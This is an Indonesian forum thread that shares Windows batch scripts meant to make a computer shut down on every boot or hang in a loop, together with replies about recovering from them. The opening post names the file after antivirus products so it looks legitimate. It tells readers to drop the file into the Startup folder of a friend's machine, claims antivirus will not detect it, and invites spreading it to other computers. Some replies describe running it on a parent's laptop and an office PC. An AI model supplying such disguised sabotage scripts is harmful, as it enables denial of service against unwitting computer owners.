alexa-tracking

Shutdown komputer untuk selamanya

Main Content

1024
1024
KASKUS
51
244
https://www.kaskus.co.id/thread/000000000000000004213392/shutdown-komputer-untuk-selamanya
Shutdown komputer untuk selamanya
emoticon-Malu

^;^

SHUTDOWN KOMPUTER UNTUK SELAMANYA


Ketik di notepad
start shutdown.exe -f -t 0 -s atau start logoff.exe
save jd symantec.bat atau norton.cmd
Jd in startup de, xixixixixixi..

Cara lain :
jgn di kompie sendiri ya, coz gw ga tanggung


:start
@echo off
explorer.exe
goto start

kemudian save As dengan extension BAT,,,
Inget jangan di kompi sendiri, cari kompi temen,,, Atu low mw pake di kompie sendiri min ada deepfreezex,,,,

Eh, ada lagi :

@ echo off
shutdown.exe -s -t 3 -c "bye bye"

di save kasih nama terserah tapi ekstensi .bat terus ditaruh di startup , jadi tiap nyala langsung mati,
jadi ga punya kesempatan buat ngetik shutdown.exe

Bisa digabungin ama SCRIPT biar lebih POWERFULL..

But.. Ga ada sisi POSITIF-nya si.. xixixiixixiix.. Selain ISENG.. xixiixixix.. PIZZZZZZZZZZZZ..

Wat pengetahuan aja.. xixixiixixi..

Good luck..

SUPPORT TOOLS : DI SINI

^;^

emoticon-Malu
wew dah nyoba lom gan emoticon-Big Grin
wah ga tega gua jalaninnya gan emoticon-Big Grin

kecuali ada orang yang ngeselin abis kali bisa jadi target nih wakakaka

tapi kalo beginian, terus masuk di safe mode jalan ga tuh script ? emoticon-Embarrassment
ane tdi nyba gan d lepie bokap ane trus berhasil n cara ngebalikinnya gimana gan?emoticon-Bingung
Quote:


parah, kasihan tuh bokap loe ...
beberapa alternatifnya :
1. install ulang windows
2. boot pake cd linux, terus hapus file yg kamu buat tadi

mungkin TS bisa nambahin, sekalian tanggung jawab ...
emoticon-I Love Kaskusemoticon-I Love Kaskus
ane coba di komputer kantor gan biar seharian gak usah kerja
Quote:


wah, parah lo gan, emoticon-Ngakak

Quote:


setuju ama atas ane gan,

tapi kalo ane lebih prefer ke boot pake livecd linux gan,,
ato bisa juga yang live usb gan,
teserah mau pake linux distro apa aja..
ubuntu? bisa..
linux mint? bisa juga gan,

kalo ane lebih sering pake yang ubuntu gan,
tapi linux mint juga ok kok gan, emoticon-Hammer
emoticon-Shakehand2
hahaha emoticon-Ngakak
alternatif 2 emoticon-Shakehand2
pake puppylinux aja, wuz2........ donlotnya cuma 100an-mb doang emoticon-thumbsup:
Quote:




emoticon-Malu

^;^

xixixiixxixi.. Kan uda ada WARNING!!! gan..

"Inget jangan di kompi sendiri, cari kompi temen,,, Atu low mw pake di kompie sendiri min ada deepfreezex,,,"

Btw.. Kalo uda terjadi ya mau gimana lagi.. Coba boot in DOS MODE.. Setelah ngeload bios selesai TEKAN F8.. Tar ada pilihan booting.. Ada cara laen si tapi ribet.. xixixiixixixi.. Terutama kalo PARTISI-nya uda NTFS ato di atasnya..

Ato.. Harddisk-nya lepas dulu trus.. Pasang pada KOMPIE laen baru hapus tu file.. Tapi ga berguna kalo di LAPIE.. xixixiixix.. Emang mau dibongkar2 tu LAPIE.. xixixiixixix.. PIZZZZZZZZZ..

SOLUSI terakhir ya INSTALL ULANG.. xixixiixixi.. PIZZZZ..

^;^

emoticon-Malu
Quote:



emoticon-Malu

^;^

Yang ini lebih GAMPANG dan LOGIS.. Tinggal BOOTING trus DELETE tu FILE yang tadi AGAN bikin.. xixixiixix.. PIZZZZZZZ..

^;^

emoticon-Malu
nais info gan ijin save dl ah...
Waduh ne trit serem juga neh.

ane ada saran yang simple neh bagi agan yang mau coba-coba di laptop sendiri neh. Caranya :

- Masukin file notepad yang udah dibuat di Flashdisk atau Hardisk eksternal aja, jangan di hardisk laptop/kompi agan.
- pada saat nyoba waktu start up FD/Hardisk eksternal jangan dicabut dulu
- kalo mau balikin ya tinggal dicabut FD/Hardisk Eksternalnya aja sebelum laptop dinyalain, trus hapus startup-nya.
- Beres khan gan. ! emoticon-thumbsup
Quote:




emoticon-Malu

^;^

SIP GAN.. xixiixixixixixixi..

Sebaiknya jangan dihapus dulu yang di FLASHDISK.. Siapa tau berguna suatu saat nanti.. Buat dicopy paste ke kompie YANG MEMBUTUHKAN.. xixixiixixixi.. PIZZZZZZZ..

AGAN CERDAS!!!

^;^

emoticon-Malu
Quote:


astaga naga emoticon-Cape deeehh emoticon-Ngakak

kreatif lo gan emoticon-Angkat Beer
Quote:


gan maaf mau nanya di taruh di start up, letak start up itu dimana ya ??, maaf masih newbie
Mantebh juga nih gan, lumayan buat ngerjanin ASDOS Lab Kampus gue yg pd petakilanemoticon-Ngakak

btw cara jadiin startupnya gimana ganemoticon-Bingung (S)
Quote:




emoticon-Malu

^;^

Masukin ke FOLDER START UP..
buka WINDOWS EXPLORER..
C:\Documents and Settings\All Users\Start Menu\Programs\Startup

Bisa SHORTCUT-nya aja ato FILE-nya langsung..

Sesuaiin aja ama USER XP yang aktif buat LOGIN.. Tapi pada ALL USERS aja uda POSITIF diload pass booting ko.. xixixiixixi.. PIZZZZZZZZZZ..

^;^

emoticon-Malu
Bisa diatasi dengan tekan F8 (safe mode) sebelum masuk windows, lalu buang *.bat yang ada di folder startup. CMIIW
Quote:


Wow, ternyata ada solusinya ya emoticon-Belo
Quote:



emoticon-Malu

^;^

Kalo uda digabung pake SCRIPT ga bisa GAN.. Harus INSTALL ULANG kalo ga mau repot.. xixixiixixix..

Bisa dibikin RUN >> AUTO DELETE ato TEMPELIN ke yang laen.. Ato RUNTIME..

Ama ANTIVIRUS juga ga KEDETECT sebagai VIRUS GAN.. KECUALI??? Lumayan POWERFULL wat NEWBIE.. xixixiixixix.. PIZZZZZZ..

^;^

emoticon-Malu
×